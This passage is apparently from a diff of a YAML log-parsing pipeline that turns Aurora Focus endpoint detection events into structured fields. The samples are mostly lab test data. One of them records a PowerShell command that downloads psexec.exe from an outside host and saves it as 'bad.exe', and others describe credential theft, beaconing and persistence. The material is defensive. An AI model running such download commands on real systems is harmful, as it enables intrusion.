Persistence (MITRE), Instigating + Process Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 949BFB5B4C7D58D92F3F9C5F8EC7CA4CEAFFD10EC5F0020F0A987C472D61C54A, + Event Timestamp: 2025-11-19T21:46:33.166Z, Event Received + Timestamp: 2025-11-19T21:46:42Z, Device Last Reported Users: + (admin\\test,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone + Ids: (E79C47BC6292419DBD0AE117798FB354), Detection Rule Id: + 5e5b01a7-2bdf-49c9-a58b-82703706a84f, Instigating Process Command + Line: C:\\Windows\\system32\\svchost.exe -k + LocalSystemNetworkRestricted -p -s PcaSvc, Instigating Process + File Path: c:\\windows\\system32\\svchost.exe, Target Process + Name: sdbinst.exe, Target Process Owner: NT AUTHORITY//SYSTEM, + Target Process ImageFileSha256: + 7E6B42AF9D8B1E1A4EFDEEB152997C7C9BBFA010B2FCE65BEF29A2903819E0E8, + Device Id: 191c967b-264c-46c3-999b-94c071e2e790, Target Process + Command Line: C:\\Windows\\System32\\sdbinst.exe -m -bg, Target + Process File Path: c:\\windows\\system32\\sdbinst.exe" + - "Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: + dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: + Jeffs Take 2 Powershell Download, Instigating Process Name: + cmd.exe, Instigating Process Owner: PENTEST//Administrator, + Instigating Process ImageFileSha256: + 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, + Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received + Timestamp: 2022-06-23T12:54:41Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: + 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command + Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process + File Path: c:\\windows\\system32\\cmd.exe, Target Process Name: + powershell.exe, Target Process Owner: PENTEST//Administrator, + Target Process ImageFileSha256: + 
BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, + Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process + Command Line: powershell -command \"(new-object + SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/inf\ + ection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File + Path: + c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_process_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA2:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target Process + Name: %{PARSE_TILL_COMMA2:target_process_name}, Target Process + Owner: %{PARSE_TILL_COMMA2:target_process_owner}, Target Process + ImageFileSha256: (%{notSpace:target_process_imagefilesha256})?, + Device Id: (%{notSpace:device_id})?, Target Process Command Line: + %{PARSE_TILL_COMMA:target_process_command_line}, Target Process + File Path: (%{notSpace:target_process_file_path})?' 
+ - type: pipeline + name: Processing Aurora Focus File Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeFileEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus File Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 3013d82e-6b4c-4677-a334-3fd4934fed7f, Severity: Informational, + Description: Win Browser CredTheft Mitre T1003, Instigating + Process Name: msedge.exe, Instigating Process Owner: admin//test, + Instigating Process ImageFileSha256: + 2C853AA78C45045C540668AC2EE63407CEF02EE55BFAFD6F678EC9E84EC23CBA, + Event Timestamp: 2025-11-19T09:45:11.336Z, Event Received + Timestamp: 2025-11-19T09:45:17Z, Device Last Reported Users: + (admin\test1,admin\test,Window Manager\DWM-1,Window + Manager\DWM-2,Window Manager\DWM-3), Zone Ids: + (E79C47BC6292419DBD0AE117798FB355), Detection Rule Id: + 26cadfe8-1b8c-489c-ae29-115b5bc9d592, Instigating Process Command + Line: "C:\Program Files + (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility + --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US + --service-sandbox-type=none --skip-read-main-dll + --metrics-shmem-handle=5020,i,3478498035652716424,1717516754338292010,524288 + --field-trial-handle=2372,i,11122849255781664600,8070874040734229388,262144 + --variations-seed-version + --trace-process-track-uuid=3190708991934122588 + --mojo-platform-channel-handle=5012 /prefetch:14, Instigating + Process File Path: c:\program files + (x86)\microsoft\edge\application\msedge.exe, Target File Path: + c:\users\test\appdata\local\google\chrome\user data\default\login + data for account, Target File Owner: admin//test, Target File + Sha256: hduy64t8459u59590i95923099, Device Id: 191c967b-264c-46c3-999b-94c071e2e790' + - 'Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, + 
Description: SYSLOG detections - Looking for a created file + cylancetest.txt, Instigating Process Name: cmd.exe, Instigating + Process Owner: PENTEST//Administrator, Instigating Process + ImageFileSha256: + BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, + Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received + Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: + (PENTEST\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, + Instigating Process Command Line: "C:\Windows\system32\cmd.exe" , + Instigating Process File Path: c:\windows\system32\cmd.exe, Target + File Path: + c:\users\administrator.pentest\downloads\syslog_test_cae_rules\cylancetest.txt, + Target File Owner: BUILTIN//Administrators, Target File Sha256: hduy64t8459u59590i95923099, + Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954' + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default),test + Devices), Event Id: c259013f-7294-41c4-8d5a-426dfd117d68, + Severity: Informational, Description: Win Browser CredentialTheft + Mitre T1003, Instigating Process Name: chrome.exe, Instigating + Process Owner: admin//test, Instigating Process ImageFileSha256: + 5186B823F4E174B13B9F60BB76ED89FE8FD44487B34B79DFE283275A13BD948B, + Event Timestamp: 2025-11-26T15:55:36.812Z, Event Received + Timestamp: 2025-11-26T15:55:54Z, Device Last Reported Users: + (admin\test,Window Manager\DWM-1,Window Manager\DWM-2), Zone Ids: + (E79C47BC6292419DBD0AE117798FB353,8F852781BD6E413285B0CD324F055674), + Detection Rule Id: d935a7df-2114-442f-a44a-728485ff1cc5, + Instigating Process Command Line: "C:\Program + Files\Google\Chrome\Application\chrome.exe" , Instigating Process + File Path: c:\program files\google\chrome\application\chrome.exe, + Target File Path: c:\users\test\appdata\local\google\chrome\user + data\default\preferences~rf24ba61f2.tmp, Target File Owner: + admin//test, Target File 
Sha256: hduy64t8459u59590i95923099, Device Id: + 191c967b-264c-46c3-999b-94c071e2e790' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_file_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target File + Path: %{PARSE_TILL_COMMA2:target_file_path}, Target File Owner: + %{PARSE_TILL_COMMA2:target_file_owner}, Target File Sha256: + (%{notSpace:target_process_imagefilesha256})?(, Device Id: + %{notSpace:device_id})?' 
+ - type: pipeline + name: Processing Aurora Focus Registry Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeRegistryEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Registry Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, + Description: SYSLOG detections - RegistryKey + \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlex\ + t, Instigating Process Name: ICreatePersistencePoints.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, + Event Timestamp: 2022-06-28T18:08:49.103Z, Event Received + Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, + Instigating Process Command Line: ICreatePersistencePoints.exe + --trigger 0, Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\ + \\icreatepersistencepoints.exe, Target Registry KeyPath: + HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywares\ + hlext, Target Registry ValueName: Unknown, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_registry_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id}), Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, 
+ Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target + Registry KeyPath: %{PARSE_TILL_COMMA2:target_registry_keypath}, + Target Registry ValueName: + %{PARSE_TILL_COMMA2:target_registry_valuename}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Network Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeNetworkEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Network Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: fbc31190-9974-48b9-956c-5e080bd6ad5b, Severity: Low, + Description: Unsigned Application Network Beaconing, Instigating + Process Name: FXAALZ.exe, Instigating Process Owner: admin//test, + Instigating Process ImageFileSha256: + F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BC, + Event Timestamp: 2025-11-19T09:52:15.782Z, Event Received + Timestamp: 2025-11-19T09:52:22Z, Device Last Reported Users: + (admin\test1,admin\test,Window Manager\DWM-1,Window + Manager\DWM-2,Window Manager\DWM-3), Zone Ids: + (E79C47BC6292419DBD0AE117798FB356), Detection Rule Id: + 6ab20572-8eb4-41a8-a8ea-d16766de0e47, Instigating Process Command + Line: "C:\CPZIVC\FXAALZ.exe" -f C:\CPZIVC\NGHVQE, Instigating + Process File Path: c:\cpzivc\fxaalz.exe, Destination IP: + 142.202.51.69, Destination Port: 9006, Device Id: + 
191c967b-264c-46c3-999b-94c071e2e797, Source IP: 192.168.90.24, + Source Port: 61130' + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 23a04c4c-1a97-4a58-b4bc-fadadb729e37, Severity: Medium, + Description: SYSLOG detections - Looking for NetworkConnection + 8.8.8.8, Instigating Process Name: ICreateNetworkConnections.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32003, + Event Timestamp: 2022-06-28T18:09:56.392Z, Event Received + Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: fdac76c9-5c6b-4b6f-8062-e074457afe3e, + Instigating Process Command Line: ICreateNetworkConnections.exe + --sequential 8.8.8.8, Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\ + \\icreatenetworkconnections.exe, Destination IP: 8.8.8.81, + Destination Port: 29281, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954, Source IP: 192.168.254.102, + Source Port: 52912" + - 'Device Name: ADMIN, Zone Names: (Windows Zone (Default),test + Devices), Event Id: c202bf55-4a24-4f8a-9922-f4627db91f8a, + Severity: Low, Description: Unsigned Application Network + Beaconing, Instigating Process Name: FXAALZ.exe, Instigating + Process Owner: admin//test, Instigating Process ImageFileSha256: + F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45Bb, + Event Timestamp: 2025-11-26T13:58:04.424Z, Event Received + Timestamp: 2025-11-26T13:58:21Z, Device Last Reported Users: + (admin\test,Window Manager\DWM-1,Window Manager\DWM-2), Zone Ids: + (E79C47BC6292419DBD0AE117798FB358,8F852781BD6E413285B0CD324F055676), + Detection Rule Id: 6ab20572-8eb4-41a8-a8ea-d16766de0e43, + Instigating Process Command Line: "C:\CPZIVC\FXAALZ.exe" -f + C:\CPZIVC\NGHVQE, 
Instigating Process File Path: + c:\cpzivc\fxaalz.exe, Destination IP: 45.9.156.106, Destination + Port: 8438, Device Id: 191c967b-264c-46c3-999b-94c071e2e793, + Source IP: 192.168.90.24, Source Port: 10067' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_network_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Destination + IP: (%{ip:network.destination.ip})?, Destination Port: + (%{port:network.destination.port})?, Device Id: + (%{notSpace:device_id})?, Source IP: (%{ip:network.client.ip})?, + Source Port: (%{port:network.client.port})?' 
+ - type: geo-ip-parser + name: Extracting Geo Location from Client IP Address + enabled: true + sources: + - network.client.ip + target: network.client.geoip + ip_processing_behavior: do-nothing + - type: geo-ip-parser + name: Extracting Geo Location from Destination IP Address + enabled: true + sources: + - network.destination.ip + target: network.destination.geoip + ip_processing_behavior: do-nothing + - type: pipeline + name: Processing Aurora Focus Memory Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeMemoryEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Memory Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), + Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, + Description: Looking for a protect memory event, Instigating + Process Name: AttackTest32.exe, Instigating Process Owner: + PENTEST/Administrator, Instigating Process ImageFileSha256: + 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, + Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received + Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: + PENTEST\\Administrator, Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, + Instigating Process Command Line: AttackTest32.exe -p:8000, + Instigating Process File Path: + c:\\users\\administrator.pentest\\downloads\\attacktest\\attackte\ + st32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_memory_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: 
%{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus DNS Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeDnsEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus DNS Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, + Description: Win_Suspicious_DNSLength_MitreT1071, Instigating + Process Name: lsass.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, + Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received + Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, + Instigating Process Command Line: + C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: + c:\\windows\\system32\\lsass.exe, Target Domain Name: + 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., + Resolved Address: securityserver.Pentest.Local, 
Resolved Address + Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_dns_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Target Domain + Name: %{PARSE_TILL_COMMA2:dns.question.name}, Resolved Address: + %{PARSE_TILL_COMMA2:resolved_address}, Resolved Address Count: + (%{integer:resolved_address_count})?, Device Id: + (%{notSpace:device_id})?' 
+ - type: pipeline + name: Processing Aurora Focus Log Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeLogEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Log Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: + Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, + Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating + Process ImageFileSha256: + BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, + Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received + Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, + Instigating Process Command Line: + C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: + c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security + Provider: SecurityAuditProvider, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_log_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + 
%{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Windows Event + Id: (%{notSpace:windows_event_id})?, Security Provider: + %{PARSE_TILL_COMMA2:security_provider}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus Powershell Trace Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaePowershellTraceEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Powershell Trace Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: SECURITYSERVER3, Zone Names: + (JeffTesting,JeffSecurityServer), Event Id: + 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, + Description: SYSLOG detections - Looking for PowershellTrace + get-childitem, Instigating Process Name: powershell.exe, + Instigating Process Owner: PENTEST//Administrator, Instigating + Process ImageFileSha256: + DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, + Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received + Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: + (PENTEST\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, + Instigating Process Command Line: powershell gwmi -class + win32_process, Instigating Process File Path: + c:\windows\system32\windowspowershell\v1.0\powershell.exe, Script + Block Text: + @{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft + Corporation"CompanyName="Micros, Script Block Length: 2583, + Payload: None, Payload Length: 0, Device Id: + c7b79f9f-4fbe-4f90-9658-ec7e17af1954' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + 
PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_powershell_trace_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, Zone Names: + %{PARSE_TILL_COMMA:zone_names}, Event Id: (%{notSpace:event_id})?, + Severity: (%{notSpace:severity})?, Description: + %{PARSE_TILL_COMMA2:description}, Instigating Process Name: + %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating Process + Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, Instigating + Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Script Block + Text: %{PARSE_TILL_COMMA2:script_block_text}, Script Block Length: + (%{integer:script_block_length})?, Payload: + %{PARSE_TILL_COMMA2:payload}, Payload Length: + (%{integer:payload_length})?, Device Id: (%{notSpace:device_id})?' 
+ - type: pipeline + name: Processing Aurora Focus WMI Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeWmiEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus WMI Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), + Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, + Description: SYSLOG detections - Looking for WmiTrace select, + Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: + NT AUTHORITY//NETWORK SERVICE, Instigating Process + ImageFileSha256: + B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, + Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received + Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: + (RIMNET\\jefwilliams), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20\ + E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, + Instigating Process Command Line: + C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, + Instigating Process File Path: + c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, + Consumer Text Length: 0, Operation: Start + IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : + MSFT_NetIPAddress, Operation Length: 80, Device Id: + c6246140-bba5-4c55-be02-77300bf91dbc" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_wmi_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + 
